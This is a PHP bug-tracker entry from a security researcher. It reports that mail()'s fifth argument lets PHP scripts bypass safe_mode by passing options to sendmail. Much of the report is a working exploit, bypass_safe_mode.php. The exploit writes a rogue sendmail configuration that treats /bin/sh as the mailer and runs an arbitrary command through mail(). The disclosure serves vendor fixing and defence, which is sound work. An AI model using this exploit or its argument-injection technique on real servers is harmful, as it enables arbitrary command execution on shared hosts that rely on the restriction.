|
|
php.net | support | documentation | report a bug | advanced search | search howto | statistics | random bug | login |
PatchesPull RequestsHistoryAllCommentsChangesGit/SVN commits
[2002-07-02 09:55 UTC] derick@php.net
|
|||||||||||||||||||||||||||
Copyright © 2001-2024 The PHP GroupAll rights reserved. |
Last updated: Tue Apr 23 11:01:33 2024 UTC |
If PHP is configured with safe_mode option enabled, special restriction are set up including limit on external binaries that may be executed from within a PHP script. The 5th argument to the mail() function (introduced in version 4.0.5) allow specifying command line option to the sendmail binary. Some time ago a bug was found in the mail() function allowing to pass shell meta-characters in the 5th argument, leading to execute arbitrary shell commands or external binaries. This bug was fixed in version 4.1.0. However, mail() function is still vulnerable because it allows to pass command line arguments to the sendmail binary which gives the ability to influence its behavior (i.e. by using non-default aliases, custom configuration files - other cases are possible with others MTAs) Passing 5th argument should be disabled if PHP is configured in safe_mode. Sample exploit that works with sendmail MTA: -----8<----- bypass_safe_mode.php -----8<----- <? $script=tempnam("/tmp", "script"); $cf=tempnam("/tmp", "cf"); $fd = fopen($cf, "w"); fwrite($fd, "OQ/tmp Sparse=0 R$*" . chr(9) . "$#local $@ $1 $: $1 Mlocal, P=/bin/sh, A=sh $script"); fclose($fd); $fd = fopen($script, "w"); fwrite($fd, "rm -f $script $cf; "); fwrite($fd, $cmd); fclose($fd); mail("nobody", "", "", "", "-C$cf"); ?> -----8<----- bypass_safe_mode.php -----8<----- Regards, Wojciech Purczynski <cliph@isec.pl> iSEC Security Research http://isec.pl/